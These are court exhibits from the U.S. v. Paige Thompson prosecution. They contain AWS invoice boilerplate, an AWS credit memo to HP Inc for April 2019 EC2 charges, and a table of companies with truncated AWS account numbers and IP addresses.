† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

| AWS Key Management Service | $268.50 |
|---|---|
| Charges | $267.74 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.76 |
| CT | $0.00 |
| Amazon Kinesis Firehose | $1,532.41 |
| Charges | $1,532.41 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

**Electronic funds transfer details:**
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: 0227
ABA Routing Number: 0248
Wire Routing Number: 0248
SWIFT Code: WFBIUS6SXXX

**or Mail payment to:**
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

## Please remit payment to Amazon Web Services:

Preferred method of payment is by Electronic Funds Transfer (EFT). Please ensure to reference the invoice number in the descriptive text field of your electronic funds transfer payment.

If you have any questions regarding payment for this invoice, please email aws-receivables-support@email.amazon.com

| Electronic funds transfer details: | or Mail payment to: |
|---|---|
| Bank Name: Wells Fargo NA<br>Account Name: Amazon Web Services, Inc.<br>Bank Address:<br>420 Montgomery Street<br>San Francisco CA 94163<br>Checking Account Number: 0227<br>ABA Routing Number: 0248<br>Wire Routing Number: 0248<br>SWIFT Code: WFBIUS6SXXX | Amazon Web Services, Inc.<br>PO BOX 84023<br>Seattle, WA 98124-8423, US |

All web services are sold by Amazon Web Services, Inc.

The above charges include charges incurred by your account as well as by all accounts you are responsible for through Consolidated Billing.

Thank you for using Amazon Web Services.

Sincerely,
**The Amazon Web Services Team**

This message was produced and distributed by Amazon Web Services, Inc., 410 Terry Avenue North, Seattle, Washington 98109-5210. AWS will not be bound by, and specifically objects to, any term, condition or other provision which is different from or in addition to the provisions of the AWS Customer Agreement or AWS Enterprise Agreement between AWS and you (whether or not it would materially alter such AWS Customer Agreement or AWS Enterprise Agreement) and which is submitted in any order, receipt, acceptance, confirmation, correspondence or otherwise, unless AWS specifically agrees to such provision in a written instrument signed by AWS.

Payer account number

███████6068



# LINKED ACCOUNT ALLOCATION

Linked account detail is not included in this invoice due to the large number of accounts. To view linked account detail please visit the Account Activity Page, aws.amazon.com/

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

16

# EXHIBIT 922



Account number:
6068

Bill to Address:
HP Inc
ATTN: Benita Fairbairn
HP Inc, Call Box 42000
Aguadilla , PR , 00605 , PR

# Amazon Web Services, Inc. Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | 2597 |
| Invoice Date: | June 27 , 2019 |
| Original Invoice Number: | 4725 |
| PO Number: | HPI3102351 |
| **TOTAL AMOUNT** | **($9,240.00)** |

**This credit memo was not applied to an invoice. You must take action to apply this credit memo to your account balance. Please deduct the amount of this credit memo from a future payment and send an email to aws-receivables-support@email.amazon.com with the remittance details of your payment.**

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | ($9,240.00) |
| Charges | ($9,240.00) |
| Tax * | $0.00 |
| Total for this invoice | ($9,240.00) |

| Detail for Consolidated Bill | |
|---|---|
| Amazon Elastic Compute Cloud | ($9,240.00) |
| Charges | ($9,240.00) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| Start Date - 04/01/2019; End Date - 04/26/2019 | ($9,215.11) |
| Start Date - 04/01/2019; End Date - 04/30/2019 | ($24.89) |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA 98109-5210 , US

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 922
Admitted__________________

Payer account number
6068

# LINKED ACCOUNT ALLOCATION

To learn more about how charges are allocated across linked accounts visit
https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/con-bill-blended-rates.html

| Activity By Account | |
|---|---|
| hpbridge-prod 9728) | ($9,240.00) |
| Charges | ($9,240.00) |
| Estimated US sales tax to be collected | $0.00 |
| Total allocated for this invoice | ($9,240.00) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
6068

| Summary for Linked Account | |
|---|---|
| hpbridge-prod 9728) | ($9,240.00) |
| Charges | ($9,240.00) |
| Estimated US sales tax to be collected | $0.00 |
| Account 9728 total allocated for this invoice | ($9,240.00) |

| Detail for Linked Account | |
|---|---|
| Amazon Elastic Compute Cloud | ($9,240.00) |
| Charges | ($9,240.00) |
| Estimated US sales tax to be collected | $0.00 |
| Start Date - 04/01/2019; End Date - 04/26/2019 | ($9,215.11) |
| Start Date - 04/01/2019; End Date - 04/30/2019 | ($24.89) |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a “Digital Service”) to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

# EXHIBIT 956

| Company | Amazon Account No. | IP Address | IAM Role |
|---|---|---|---|
| Capital One | 9784 | 34.234.188.25 | |
| Apperian (Digital.Ai) | 3769 | 54.77.46.101<br>54.198.107.105 | |
| 42 Lines | 6483 | 18.235.8.209 | |
| Survox (Enghouse) | 0924 | 35.161.43.11 | |
| Waitrainer | 3625 | 13.52.44.117 | |
| A T Works | 4197 | 13.113.12.133 | |
| Powersquare India | 7507 | 18.208.62.195 | |
| Hewlett-Packard Inc. | 9728 | 54.193.62.96 | |
| Vodafone | 1427 | 63.34.213.125 | |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 956
Admitted___________________